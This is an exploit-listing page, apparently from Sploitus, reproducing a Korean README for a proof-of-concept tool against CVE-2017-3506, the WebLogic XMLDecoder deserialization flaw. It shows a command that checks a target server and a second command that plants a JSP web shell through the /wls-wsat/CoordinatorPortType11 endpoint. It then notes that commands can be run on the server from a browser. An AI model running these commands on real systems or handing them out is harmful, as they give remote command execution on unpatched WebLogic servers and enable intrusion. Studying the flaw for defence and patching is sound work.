Sploitus

Exploit for CVE-2017-3506

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN30 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-AL1EX-CVE-2017-3506
#### 이것은 무엇인가?

이것은 CVE-2017-3506(Weblogic XMLDecoder Serialization)의 PoCμž…λ‹ˆλ‹€.

#### μ–΄λ–»κ²Œ μ‚¬μš©ν•˜λ‚˜μš”?

###### 취약점 확인

root@kitploit:~
    
    
    java -jar WebLogic-XMLDecoder.jar -u http://192.168.174.144:7001
    

![check](https://assets.kitploit.com/production/public/readmes/15082/664ba8a7ef503411ab6b409f631fd2eb83dbafab7c7f6aa14967bdce041e4319.png)

##### μ…Έ νšλ“

root@kitploit:~
    
    
    java -jar WebLogic-XMLDecoder.jar -s http://192.168.174.144:7001 /wls-wsat/CoordinatorPortType11 shell.jsp
    

![GetShell](https://assets.kitploit.com/production/public/readmes/15082/ba0ed7c9bfd2487aa4704441f47f93e62a58563cfc1f2b84d197294e6fe1f4cb.png)

그런 λ‹€μŒ λΈŒλΌμš°μ €λ₯Ό 톡해 λͺ…령을 μ‹€ν–‰ν•  수 μžˆμŠ΅λ‹ˆλ‹€:

![execut_command](https://assets.kitploit.com/production/public/readmes/15082/137e5d3231dacb1cde08d593687e59c3f83ce16455a1becee039083687117539.png)